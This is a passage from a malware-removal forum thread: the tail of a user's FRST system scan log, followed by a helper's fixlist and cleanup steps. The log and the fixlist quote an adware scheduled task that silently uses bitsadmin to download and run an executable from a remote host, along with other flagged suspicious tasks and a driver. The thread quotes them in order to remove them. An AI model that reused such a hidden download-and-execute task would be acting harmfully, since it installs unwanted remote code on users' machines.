Roxio Creator BDAV Plugin (HKLM\...\{880AF49C-34F7-4285-A8AD-8F7A3D1C33DC}) (Version: 3.5.0 - Roxio)
Roxio Creator Copy (HKLM\...\{619CDD8A-14B6-43A1-AB6C-0F4EE48CE048}) (Version: 3.5.0 - Roxio)
Roxio Creator Data (HKLM\...\{0D397393-9B50-4C52-84D5-77E344289F87}) (Version: 3.5.0 - Roxio)
Roxio Creator DE (HKLM\...\{C8B0680B-CDAE-4809-9F91-387B6DE00F7C}) (Version: 3.5.0 - Roxio)
Roxio Creator Tools (HKLM\...\{0394CDC8-FABD-4ED8-B104-03393876DFDF}) (Version: 3.5.0 - Roxio)
Roxio Express Labeler 3 (HKLM\...\{6675CA7F-E51B-4F6A-99D4-F8F0124C6EAA}) (Version: 3.2.1 - Roxio)
Roxio Update Manager (HKLM\...\{30465B6C-B53F-49A1-9EBA-A3F187AD502E}) (Version: 6.0.0 - Roxio)
Samsung New PC Studio (HKLM\...\InstallShield_{F193FC0E-9E18-40FC-A974-509A1BDD240A}) (Version: 1.00.0000 - Samsung Electronics Co., Ltd.)
Samsung New PC Studio (Version: 1.00.0000 - Samsung Electronics Co., Ltd.) Hidden
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.3.650.0 - SAMSUNG Electronics Co., Ltd.)
SkinsHP1 (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Sonic CinePlayer Decoder Pack (HKLM\...\{8D337F77-BE7F-41A2-A7CB-D5A63FD7049B}) (Version: 4.2.0 - Sonic Solutions)
Spybot - Search & Destroy (HKLM\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
Steam (HKLM\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TBS WMP Plug-in (HKLM\...\InstallShield_{13515135-48BB-4184-8C1F-2FAE0138E200}) (Version: 1.00.676 - CNN)
TBS WMP Plug-in (Version: 1.00.676 - CNN) Hidden
The Witcher: Enhanced Edition (HKLM\...\Steam App 20900) (Version:  - CD Projekt RED)
TrayApp (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Unity Web Player (HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Unload (Version: 4.0.0 - Hewlett-Packard) Hidden
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
VC 9.0 Runtime (Version: 1.0.0 - Check Point Software Technologies Ltd) Hidden
VLC media player 1.0.1 (HKLM\...\VLC media player) (Version: 1.0.1 - VideoLAN Team)
WebReg (Version: 43.1.5.000 - Hewlett-Packard) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Sync (HKLM\...\{FDD810CA-D5E3-40E9-AB7B-36440B0D41EF}) (Version: 14.0.8050.1202 - Microsoft Corporation)
Windows Live Upload Tool (HKLM\...\{205C6BDD-7B73-42DE-8505-9A093F35A238}) (Version: 14.0.8014.1029 - Microsoft Corporation)
Windows Media Player Firefox Plugin (HKLM\...\{69FDFBB6-351D-4B8C-89D8-867DC9D0A2A4}) (Version: 1.0.0.8 - Microsoft Corp)
 
==================== Custom CLSID (selected items): ==========================
 
(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)
 
CustomCLSID: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000_Classes\CLSID\{38AB6A6C-CC4C-4f9e-A3DD-3C5681EF18A1}\InprocServer32 -> C:\Users\Angel\AppData\Roaming\Mozilla\Firefox\Profiles\8jwsqryn.default\extensions\{38AB6A6C-CC4C-4 (the data entry has 48 more characters).
CustomCLSID: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000_Classes\CLSID\{3EC350A7-5C5E-4192-B734-E13722E10914}\InprocServer32 -> C:\Program Files\HP\HP Software Update\HPRulesEngine.dll (Hewlett-Packard Company)
CustomCLSID: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000_Classes\CLSID\{444785F1-DE89-4295-863A-D46C3A781394}\InprocServer32 -> C:\Users\Angel\AppData\LocalLow\Unity\WebPlayer\loader\UnityWebPluginAX.ocx (Unity Technologies ApS)
 
==================== Restore Points  =========================
 
23-03-2015 11:44:32 Scheduled Checkpoint
26-03-2015 10:04:41 Windows Update
30-03-2015 12:03:45 Windows Update
02-04-2015 14:13:17 Windows Update
02-04-2015 18:17:48 Restore Operation
02-04-2015 18:53:53 Windows Update
02-04-2015 19:35:07 Windows Update
06-04-2015 12:53:05 Windows Update
08-04-2015 12:51:35 Scheduled Checkpoint
10-04-2015 16:46:36 Windows Update
11-04-2015 22:42:05 Removed iTunes
11-04-2015 22:46:02 Removed Bonjour
11-04-2015 22:49:56 Installed iTunes
12-04-2015 17:59:00 Windows Modules Installer
13-04-2015 13:03:15 Scheduled Checkpoint
13-04-2015 14:20:32 Revo Uninstaller's restore point - Coupon Printer for Windows
13-04-2015 14:22:36 Revo Uninstaller's restore point - Reimage Repair
13-04-2015 14:25:16 Revo Uninstaller's restore point - Shopping Helper Smartbar
13-04-2015 14:27:26 Revo Uninstaller's restore point - Shopping Helper Smartbar
13-04-2015 14:28:08 Revo Uninstaller's restore point - Shopping Helper Smartbar Engine
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2006-11-02 05:23 - 2015-04-12 20:17 - 00451469 ____R C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost
 
There are 1000 more lines.
 
 
==================== Scheduled Tasks (whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
 
Task: {04D7FA9D-8045-4496-A910-855A2B4FDD46} - \ASP No Task File <==== ATTENTION
Task: {0C0ACF2A-85AA-457B-B56B-C0FF5A803C48} - \FF Watcher {3186DD48-9E2A-4523-9F9C-5CFCC3C3BC10} No Task File <==== ATTENTION
Task: {15B98890-7862-4EB6-9F04-C86AA4B30ED3} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {1756FC84-4B84-4489-A32A-89CF57DE0260} - System32\Tasks\amiupdaterExd => cmd.exe /c start /min bitsadmin /transfer amijob /download /priority high http://d17xr4aw9ok0me.cloudfront.net/Updater.exe "C:\Users\Angel\AppData\Local\Temp\amiupdater175.exe"
Task: {1E227E50-07C4-4479-ADCD-AF829E565408} - \Mext Guard FBE8818C-5B13-48C2-A93E-AD731167DBF2 No Task File <==== ATTENTION
Task: {2B5725B7-C8CD-4C44-A84A-2D3E3C842E53} - System32\Tasks\RtlNICDiagVistaStart => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe [2008-08-19] (Realtek)
Task: {2C62F3F5-FBF2-4876-9A8D-8BE4F136FB64} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-03-13] (Piriform Ltd)
Task: {3BBA328E-4379-4529-B561-54BA6D774C55} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-09-29] (Google Inc.)
Task: {3CAD3FE6-5704-4E5F-8796-36F6155E7BD5} - System32\Tasks\{597FAF1C-9F17-4FBC-917E-BDCD12142EB5} => pcalua.exe -a E:\setup.exe -d E:\
Task: {4E8CAF01-3DAC-4A8B-B283-511599629E2C} - \Idle~_~Crawler Runner No Task File <==== ATTENTION
Task: {6586E20B-2210-4C87-8DA3-941E7CCB4C11} - System32\Tasks\Scan the system (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search &amp; Destroy 2\SDScan.exe
Task: {70A81FD7-F19C-48EF-B9A2-057CE879CF79} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2015-02-04] (Adobe Systems Incorporated)
Task: {7A14E8EA-A987-4687-AA80-8CC58A9C4624} - \RocketTab No Task File <==== ATTENTION
Task: {7CDC9FA6-084D-42D0-9D11-267A98778EF1} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-09-29] (Google Inc.)
Task: {8B2810B7-292B-4C79-9C55-05F873DF7A5F} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated)
Task: {A2A83717-5995-48CA-85DE-4FC74F3D8ED1} - \AmiUpdXp No Task File <==== ATTENTION
Task: {B0A2C3D0-4B3B-4591-B037-13F9DF6031F0} - \RocketTab Update Task No Task File <==== ATTENTION
Task: {BCE0938D-23E3-4454-B630-F48F50BACE78} - \PennyBee No Task File <==== ATTENTION
Task: {C243BE3D-4FDA-4B1E-8A6A-914D96BAD2C1} - \Groovorio Updater No Task File <==== ATTENTION
Task: {CDCCD7C6-13F9-4525-9576-9B26112FB9EA} - System32\Tasks\amiupdaterExi => C:\Users\Angel\AppData\Local\Temp\amiupdater175.exe <==== ATTENTION
Task: {E41555CC-B83C-4225-A5A1-3DA9A104ABC7} - System32\Tasks\Microsoft\Windows\Maintenance\Idle~_~Crawler Update => %LOCALAPPDATA%\Idle~_~Crawler\Idle~_~Crawler.exe <==== ATTENTION
Task: {ED5063D5-5DB8-447F-98FF-1F9CF2EBBDE0} - System32\Tasks\Check for updates (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search &amp; Destroy 2\SDUpdate.exe
Task: {FAFBC4FC-F442-4283-B32F-F0F4D650782F} - System32\Tasks\Refresh immunization (Spybot - Search & Destroy) => C:\Program Files\Spybot - Search &amp; Destroy 2\SDImmunize.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDImmunize.exe
Task: C:\Windows\Tasks\RtlNICDiagVistaStart.job => C:\Program Files\Realtek\RTNICDiag\RTNICDiag.exe
Task: C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job => C:\Program Files\Spybot - Search & Destroy 2\SDScan.exe
 
==================== Loaded Modules (whitelisted) ==============
 
2014-01-20 14:17 - 2014-01-20 14:17 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-01-20 23:35 - 2015-01-20 23:35 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2014-09-29 09:15 - 2014-05-13 12:04 - 00109400 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlThirdParty150.bpl
2014-09-29 09:15 - 2014-05-13 12:04 - 00416600 _____ () C:\Program Files\Spybot - Search & Destroy 2\DEC150.bpl
2014-09-29 09:15 - 2014-05-13 12:04 - 00167768 _____ () C:\Program Files\Spybot - Search & Destroy 2\snlFileFormats150.bpl
2014-09-29 09:15 - 2012-08-23 10:38 - 00574840 _____ () C:\Program Files\Spybot - Search & Destroy 2\sqlite3.dll
2014-09-29 09:15 - 2012-04-03 17:06 - 00565640 _____ () C:\Program Files\Spybot - Search & Destroy 2\av\BDSmartDB.dll
2009-02-17 15:51 - 2002-07-04 10:38 - 00053248 _____ () C:\Program Files\ArcSoft\PhotoImpression 5\share\pihook.dll
2015-02-15 22:06 - 2015-02-15 22:06 - 02391040 _____ () C:\Program Files\Smgy0ntk1mjjizdb\mgi0nzk4mjziyjb.exe
2015-01-06 08:18 - 2015-01-06 08:18 - 00039192 _____ () C:\Program Files\CCleaner\branding.dll
2015-04-02 18:44 - 2015-03-30 16:07 - 09279304 _____ () C:\Program Files\Google\Chrome\Application\41.0.2272.118\pdf.dll
2015-04-02 18:44 - 2015-03-30 16:07 - 14974280 _____ () C:\Program Files\Google\Chrome\Application\41.0.2272.118\PepperFlash\pepflashplayer.dll
2013-07-11 03:07 - 2013-07-11 03:07 - 03391488 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\mscorlib\1.0.5000.0__b77a5c561934e089_a87a9960\mscorlib.dll
2013-07-11 03:06 - 2013-07-11 03:06 - 03035136 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system.windows.forms\1.0.5000.0__b77a5c561934e089_6eec51ce\system.windows.forms.dll
2013-07-11 03:06 - 2013-07-11 03:06 - 01966080 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system\1.0.5000.0__b77a5c561934e089_3b70900d\system.dll
2013-07-11 03:07 - 2013-07-11 03:07 - 00843776 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system.drawing\1.0.5000.0__b03f5f7f11d50a3a_318f459e\system.drawing.dll
2013-07-11 03:06 - 2013-07-11 03:06 - 02088960 _____ () c:\windows\assembly\nativeimages1_v1.1.4322\system.xml\1.0.5000.0__b77a5c561934e089_c7963648\system.xml.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\vsmon => ""="Service"
 
==================== EXE Association (whitelisted) ===============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Angel\AppData\Roaming\Microsoft\Windows Live Photo Gallery\Windows Live Photo Gallery Wallpaper.jpg
DNS Servers: 192.168.1.254
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1464855766-1936325176-3098395914-500 - Administrator - Disabled)
Angel (S-1-5-21-1464855766-1936325176-3098395914-1000 - Administrator - Enabled) => C:\Users\Angel
ASPNET (S-1-5-21-1464855766-1936325176-3098395914-1002 - Limited - Enabled)
Guest (S-1-5-21-1464855766-1936325176-3098395914-501 - Limited - Disabled)
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (04/13/2015 02:36:00 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/13/2015 02:28:08 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
Error: (04/13/2015 02:27:26 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
Error: (04/13/2015 02:25:15 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
Error: (04/13/2015 02:22:36 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
Error: (04/13/2015 02:20:32 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005.
This is often caused by incorrect security settings in either the writer or requestor process.
 
 
Operation:
   Gathering Writer Data
 
Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {2da99d99-68f3-4ca8-9da1-7b7415608f08}
 
Error: (04/13/2015 11:12:23 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/12/2015 11:45:12 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/12/2015 08:55:02 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
Error: (04/12/2015 08:26:52 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
 
 
System errors:
=============
Error: (04/13/2015 02:38:47 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Windows Font Cache Service%%1053
 
Error: (04/13/2015 02:38:47 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: 30000Windows Font Cache Service
 
Error: (04/13/2015 02:34:51 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Windows Search2300001Restart the service
 
Error: (04/13/2015 02:34:33 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Windows Installer11200001Restart the service
 
Error: (04/13/2015 02:34:33 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Volume Shadow Copy1
 
Error: (04/13/2015 02:34:32 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: iPod Service1
 
Error: (04/13/2015 02:34:31 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Windows Search1300001Restart the service
 
Error: (04/13/2015 02:34:31 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Spybot-S&D 2 Security Center Service1600001Restart the service
 
Error: (04/13/2015 02:34:31 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Intel® Matrix Storage Event Monitor1
 
Error: (04/13/2015 02:34:31 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Spybot-S&D 2 Updating Service1600001Restart the service
 
 
Microsoft Office Sessions:
=========================
Error: (03/26/2014 06:52:30 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6690.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 8129 seconds with 3120 seconds of active time.  This session ended with a crash.
 
Error: (03/24/2014 07:49:14 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6690.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 17 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (03/24/2014 07:48:48 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6690.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 2505 seconds with 1020 seconds of active time.  This session ended with a crash.
 
Error: (03/12/2014 09:18:57 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6690.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 14721 seconds with 6540 seconds of active time.  This session ended with a crash.
 
Error: (12/15/2013 07:23:08 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6683.5002, Microsoft Office Version: 12.0.6612.1000. This session lasted 19238 seconds with 3120 seconds of active time.  This session ended with a crash.
 
Error: (12/15/2013 02:02:18 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6683.5002, Microsoft Office Version: 12.0.6612.1000. This session lasted 284 seconds with 180 seconds of active time.  This session ended with a crash.
 
Error: (12/15/2013 01:56:07 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6683.5002, Microsoft Office Version: 12.0.6612.1000. This session lasted 9327 seconds with 2760 seconds of active time.  This session ended with a crash.
 
Error: (09/30/2013 08:41:20 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6683.5001, Microsoft Office Version: 12.0.6612.1000. This session lasted 49 seconds with 0 seconds of active time.  This session ended with a crash.
 
 
CodeIntegrity Errors:
===================================
  Date: 2015-04-13 15:11:13.087
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:11:12.669
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:11:12.247
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:11:11.218
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:11:10.654
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:11:10.368
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:11:09.784
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:11:09.405
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:10:27.403
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2015-04-13 15:10:27.023
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™2 Duo CPU E7300 @ 2.66GHz
Percentage of memory in use: 85%
Total physical RAM: 3036.26 MB
Available physical RAM: 447.16 MB
Total Pagefile: 6283.5 MB
Available Pagefile: 3481.06 MB
Total Virtual: 2047.88 MB
Available Virtual: 1914.67 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:288.04 GB) (Free:159.58 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:10 GB) (Free:4.79 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 298.1 GB) (Disk ID: 38000000)
Partition 1: (Not Active) - (Size=55 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=10 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=288 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================
 
 
 
 
 
 


#4 deeprybka

  • Malware Response Team

Posted 14 April 2015 - 03:12 AM

Hi there,
 
Step 1

Press the Windows key + R on your keyboard at the same time. Type notepad and click OK.
  • Copy the entire content of the codebox below and paste into the notepad document:
    CloseProcesses:
    HKLM\...\Run: [NPSStartup] => [X]
    HKLM\...\Run: [mgy0ntk1mjjizdb] => C:\Program Files\Smgy0ntk1mjjizdb\mgi0nzk4mjziyjb.exe [2391040 2015-02-15] ()
    C:\Program Files\Smgy0ntk1mjjizdb
    Winlogon\Notify\SDWinLogon: SDWinLogon.dll [X]
    GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
    HKU\S-1-5-21-1464855766-1936325176-3098395914-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction 
    SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
    BHO: No Name -> {1FD79A59-37B1-459B-9097-09F9FAB8A523} ->  No File
    BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} ->  No File
    Toolbar: HKU\S-1-5-21-1464855766-1936325176-3098395914-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
    R1 mgi0nzk4mjziyjb; C:\Windows\System32\drivers\mgi0nzk4mjziyjb.sys [56200 2015-02-15] (NetFilterSDK.com)
    C:\Windows\System32\drivers\mgi0nzk4mjziyjb.sys 
    2015-03-28 21:14 - 2015-03-28 21:14 - 00000000 ____D () C:\Users\Angel\AppData\Local\Setup642505
    2015-03-28 21:13 - 2015-03-28 21:14 - 00000000 ____D () C:\Users\Angel\AppData\Local\mota
    2015-03-22 23:13 - 2015-03-22 23:14 - 00000000 ____D () C:\Program Files\Smgy0ntk1mjjizdb(232)
    Task: {04D7FA9D-8045-4496-A910-855A2B4FDD46} - \ASP No Task File 
    Task: {0C0ACF2A-85AA-457B-B56B-C0FF5A803C48} - \FF Watcher {3186DD48-9E2A-4523-9F9C-5CFCC3C3BC10} No Task File 
    Task: {1756FC84-4B84-4489-A32A-89CF57DE0260} - System32\Tasks\amiupdaterExd => cmd.exe /c start /min bitsadmin /transfer amijob /download /priority high http://d17xr4aw9ok0me.cloudfront.net/Updater.exe 
    Task: {1E227E50-07C4-4479-ADCD-AF829E565408} - \Mext Guard FBE8818C-5B13-48C2-A93E-AD731167DBF2 No Task File 
    Task: {4E8CAF01-3DAC-4A8B-B283-511599629E2C} - \Idle~_~Crawler Runner No Task File 
    Task: {7A14E8EA-A987-4687-AA80-8CC58A9C4624} - \RocketTab No Task File 
    Task: {A2A83717-5995-48CA-85DE-4FC74F3D8ED1} - \AmiUpdXp No Task File 
    Task: {B0A2C3D0-4B3B-4591-B037-13F9DF6031F0} - \RocketTab Update Task No Task File 
    Task: {BCE0938D-23E3-4454-B630-F48F50BACE78} - \PennyBee No Task File 
    Task: {C243BE3D-4FDA-4B1E-8A6A-914D96BAD2C1} - \Groovorio Updater No Task File 
    Task: {CDCCD7C6-13F9-4525-9576-9B26112FB9EA} - System32\Tasks\amiupdaterExi => C:\Users\Angel\AppData\Local\Temp\amiupdater175.exe 
    Task: {E41555CC-B83C-4225-A5A1-3DA9A104ABC7} - System32\Tasks\Microsoft\Windows\Maintenance\Idle~_~Crawler Update => %LOCALAPPDATA%\Idle~_~Crawler\Idle~_~Crawler.exe 
    EmptyTemp:
    
  • Click File, Save As and type fixlist.txt as the File Name.
Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!
  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.
Please post it to your reply.

After the Reboot:

Step 2

Start FRST with administrator privileges.
  • Make sure the Addition.txt option is checked.
  • Press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
    Please copy and paste these logs in your next reply.

regards,
deeprybka
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer
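
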